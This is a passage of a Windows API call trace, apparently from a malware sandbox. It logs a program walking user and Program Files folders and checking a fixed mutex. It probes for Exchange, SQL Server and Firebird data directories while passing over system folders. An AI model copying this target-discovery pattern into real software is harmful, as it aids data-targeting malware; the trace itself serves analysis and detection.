returned 0x588000 [0103.861] GlobalHandle (pMem=0x570108) returned 0x450004 [0103.861] GlobalUnlock (hMem=0x450004) returned 0 [0103.861] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.861] GlobalUnlock (hMem=0x45000c) returned 0 [0103.861] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.861] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18effc, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0103.861] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18e3fc, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0103.861] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.861] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18effc, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0103.862] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18e3fc, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 46 [0103.862] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.862] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18effc, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0103.862] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab68, cbMultiByte=15, lpWideCharStr=0x18e3fc, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 15 [0103.862] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.862] GetEnvironmentVariableA (in: lpName="WINDIR", 
lpBuffer=0x18effc, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0103.862] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=11, lpWideCharStr=0x18e3fc, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 11 [0103.863] GlobalLock (hMem=0x45000c) returned 0x570108 [0103.863] GlobalHandle (pMem=0x570108) returned 0x45000c [0103.863] GlobalUnlock (hMem=0x45000c) returned 0 [0103.863] GlobalLock (hMem=0x45000c) returned 0x570108 [0103.863] GlobalLock (hMem=0x450004) returned 0x588000 [0103.863] GlobalHandle (pMem=0x570108) returned 0x45000c [0103.863] GlobalUnlock (hMem=0x45000c) returned 0 [0103.863] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.863] GlobalUnlock (hMem=0x450004) returned 0 [0103.863] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.863] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab68, cbMultiByte=15, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 15 [0103.863] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.863] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=11, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 11 [0103.864] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=9, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact 
Edition\\") returned 9 [0103.864] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab68, cbMultiByte=18, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 18 [0103.864] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 28 [0103.865] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=10, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 10 [0103.865] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=8, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 8 [0103.865] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=9, lpWideCharStr=0x18e404, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 9 [0103.866] 
CharLowerBuffW (in: lpsz="C:\\PerfLogs\\Admin\\", cchLength=0x12 | out: lpsz="c:\\perflogs\\admin\\") returned 0x12 [0103.866] SHGetMalloc (in: ppMalloc=0x18f44c | out: ppMalloc=0x18f44c*=0x767666bc) returned 0x0 [0103.866] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18f448 | out: ppidl=0x18f448) returned 0x0 [0103.866] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0103.867] SysReAllocStringLen (in: pbstr=0x18f4d0*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18f4d0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0103.867] IMalloc:Free (This=0x767666bc, pv=0x578208) [0103.867] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0103.867] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0103.868] GlobalLock (hMem=0x450004) returned 0x570108 [0103.868] GlobalHandle (pMem=0x570108) returned 0x450004 [0103.868] GlobalUnlock (hMem=0x450004) returned 0 [0103.868] GlobalLock (hMem=0x450004) returned 0x570108 [0103.868] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.868] GlobalHandle (pMem=0x570108) returned 0x450004 [0103.868] GlobalUnlock (hMem=0x450004) returned 0 [0103.868] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.868] GlobalUnlock (hMem=0x45000c) returned 0 [0103.868] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*.*", lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x577e88 [0103.868] FindNextFileW (in: 
hFindFile=0x577e88, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.868] FindNextFileW (in: hFindFile=0x577e88, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0103.868] GetLastError () returned 0x12 [0103.868] FindClose (in: hFindFile=0x577e88 | out: hFindFile=0x577e88) returned 1 [0103.869] GlobalLock (hMem=0x45000c) returned 0x570108 [0103.869] GlobalHandle (pMem=0x570108) returned 0x45000c [0103.869] GlobalUnlock (hMem=0x45000c) returned 0 [0103.869] GlobalLock (hMem=0x45000c) returned 0x570108 [0103.869] GlobalLock (hMem=0x450004) returned 0x588000 [0103.869] GlobalHandle (pMem=0x570108) returned 0x45000c [0103.869] GlobalUnlock (hMem=0x45000c) returned 0 [0103.869] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.869] GlobalUnlock (hMem=0x450004) returned 0 [0103.869] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*.*", lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x577e88 [0103.869] FileTimeToLocalFileTime (in: lpFileTime=0x18f538, lpLocalFileTime=0x18f448 | out: lpLocalFileTime=0x18f448) returned 1 [0103.869] FileTimeToDosDateTime (in: lpFileTime=0x18f448, lpFatDate=0x18f506, lpFatTime=0x18f504 | out: lpFatDate=0x18f506, lpFatTime=0x18f504) returned 1 [0103.869] GlobalLock (hMem=0x450004) returned 0x570108 [0103.869] GlobalHandle (pMem=0x570108) returned 0x450004 [0103.869] GlobalUnlock (hMem=0x450004) returned 0 [0103.870] GlobalLock (hMem=0x450004) returned 0x570108 [0103.870] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.870] GlobalHandle (pMem=0x570108) returned 0x450004 [0103.870] GlobalUnlock (hMem=0x450004) returned 0 [0103.870] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.870] GlobalUnlock (hMem=0x45000c) returned 0 [0103.870] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.870] FindNextFileW (in: hFindFile=0x577e88, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.870] FileTimeToLocalFileTime (in: lpFileTime=0x18f538, lpLocalFileTime=0x18f444 | out: lpLocalFileTime=0x18f444) returned 1 [0103.872] FileTimeToDosDateTime (in: lpFileTime=0x18f444, lpFatDate=0x18f506, lpFatTime=0x18f504 | out: lpFatDate=0x18f506, lpFatTime=0x18f504) returned 1 [0103.872] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.872] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.872] GlobalUnlock (hMem=0x45000c) returned 0 
[0103.872] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.872] GlobalLock (hMem=0x450004) returned 0x58a010 [0103.872] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.873] GlobalUnlock (hMem=0x45000c) returned 0 [0103.873] GlobalHandle (pMem=0x58a010) returned 0x450004 [0103.873] GlobalUnlock (hMem=0x450004) returned 0 [0103.873] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.873] FindNextFileW (in: hFindFile=0x577e88, lpFindFileData=0x18f524 | out: lpFindFileData=0x18f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0103.873] GetLastError () returned 0x12 [0103.873] FindClose (in: hFindFile=0x577e88 | out: hFindFile=0x577e88) returned 1 [0103.873] FindNextFileW (in: hFindFile=0x577df0, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 0 [0103.873] GetLastError () returned 0x12 [0103.873] FindClose (in: hFindFile=0x577df0 | out: hFindFile=0x577df0) returned 1 [0103.874] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe61d3d20, 
ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe61d3d20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0103.874] FileTimeToLocalFileTime (in: lpFileTime=0x18fbb8, lpLocalFileTime=0x18fac4 | out: lpLocalFileTime=0x18fac4) returned 1 [0103.874] FileTimeToDosDateTime (in: lpFileTime=0x18fac4, lpFatDate=0x18fb86, lpFatTime=0x18fb84 | out: lpFatDate=0x18fb86, lpFatTime=0x18fb84) returned 1 [0103.874] GlobalLock (hMem=0x450004) returned 0x588000 [0103.874] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.874] GlobalUnlock (hMem=0x450004) returned 0 [0103.874] GlobalLock (hMem=0x450004) returned 0x588000 [0103.874] GlobalLock (hMem=0x45000c) returned 0x58a010 [0103.874] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.874] GlobalUnlock (hMem=0x450004) returned 0 [0103.874] GlobalHandle (pMem=0x58a010) returned 0x45000c [0103.874] GlobalUnlock (hMem=0x45000c) returned 0 [0103.874] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.875] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.875] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.875] GlobalUnlock (hMem=0x45000c) returned 0 [0103.875] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.875] GlobalLock (hMem=0x450004) returned 0x58a010 [0103.875] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.875] GlobalUnlock (hMem=0x45000c) returned 0 [0103.875] GlobalHandle (pMem=0x58a010) returned 0x450004 [0103.875] GlobalUnlock (hMem=0x450004) returned 0 [0103.875] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.875] SysReAllocStringLen (in: pbstr=0x18fac4*=0x0, psz="C:\\Program Files", len=0x10 | out: pbstr=0x18fac4*="C:\\Program Files") returned 1 [0103.875] GlobalLock (hMem=0x450004) 
returned 0x588000 [0103.875] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.875] GlobalUnlock (hMem=0x450004) returned 0 [0103.875] GlobalLock (hMem=0x450004) returned 0x588000 [0103.876] GlobalLock (hMem=0x45000c) returned 0x58a010 [0103.876] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.876] GlobalUnlock (hMem=0x450004) returned 0 [0103.876] GlobalHandle (pMem=0x58a010) returned 0x45000c [0103.876] GlobalUnlock (hMem=0x45000c) returned 0 [0103.876] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft\\Exchange Server", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="䱈@網X綆X企@\x18㵤V頻\x18\x1b")) returned 0xffffffff [0103.876] GetLastError () returned 0x3 [0103.876] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0103.876] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=26, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0103.877] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\ct Edition\\\x18\x18?眔") returned 21 [0103.877] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, 
ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="㷴V䱠@絤X企@\x18㮴V頻\x181")) returned 0xffffffff [0103.877] GetLastError () returned 0x2 [0103.877] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0103.877] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=21, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0103.877] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\ct Edition\\\x18\x18?眔") returned 9 [0103.878] FindFirstFileW (in: lpFileName="C:\\Program Files\\Firebird", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="㷴V䱠@㌤W企@\x18㢴X頻\x18;")) returned 0xffffffff [0103.878] GetLastError () returned 0x2 [0103.878] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0103.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=9, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0103.878] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: 
lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\ct Edition\\\x18\x18?眔") returned 8 [0103.879] FindFirstFileW (in: lpFileName="C:\\Program Files\\MSSQL.1", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="㷴V䱠@㵤V企@\x18㤬X頻\x18D")) returned 0xffffffff [0103.879] GetLastError () returned 0x2 [0103.879] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0103.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=8, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\ ") returned 8 [0103.879] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\\x18\x18?眔") returned 37 [0103.879] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="Microsoft SQL Server Compact Edition", cAlternateFileName="MICROS~3")) returned 0x577e78 [0103.879] FileTimeToLocalFileTime (in: lpFileTime=0x18f554, lpLocalFileTime=0x18f4d4 | out: lpLocalFileTime=0x18f4d4) returned 1 
[0103.880] FileTimeToDosDateTime (in: lpFileTime=0x18f4d4, lpFatDate=0x18f522, lpFatTime=0x18f520 | out: lpFatDate=0x18f522, lpFatTime=0x18f520) returned 1 [0103.880] FindClose (in: hFindFile=0x577e78 | out: hFindFile=0x577e78) returned 1 [0103.880] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\\x18\x18?眔") returned 37 [0103.880] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.880] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.880] GlobalUnlock (hMem=0x45000c) returned 0 [0103.880] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.880] GlobalLock (hMem=0x450004) returned 0x58a010 [0103.880] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.880] GlobalUnlock (hMem=0x45000c) returned 0 [0103.880] GlobalHandle (pMem=0x58a010) returned 0x450004 [0103.880] GlobalUnlock (hMem=0x450004) returned 0 [0103.880] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.881] SysReAllocStringLen (in: pbstr=0x18f790*=0x0, psz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", len=0x36 | out: pbstr=0x18f790*="C:\\Program Files\\Microsoft SQL Server Compact Edition\\") returned 1 [0103.881] GlobalLock (hMem=0x450004) returned 0x588000 [0103.881] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.881] GlobalUnlock (hMem=0x450004) returned 0 [0103.881] GlobalLock (hMem=0x450004) returned 0x588000 [0103.881] GlobalLock (hMem=0x45000c) returned 0x58a010 [0103.881] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.881] GlobalUnlock (hMem=0x450004) returned 0 [0103.881] GlobalHandle (pMem=0x58a010) returned 0x45000c [0103.881] GlobalUnlock (hMem=0x45000c) returned 0 [0103.881] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\Microsoft\\Exchange Server", lpFindFileData=0x18f20c | out: 
lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="䱈@巼W巐W企@\x18㵤V\x18\x1b")) returned 0xffffffff [0103.881] GetLastError () returned 0x3 [0103.882] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.882] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=26, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0103.882] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=21, lpWideCharStr=0x18e458, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\tion\\") returned 21 [0103.882] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\Microsoft SQL Server", lpFindFileData=0x18f20c | out: lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, 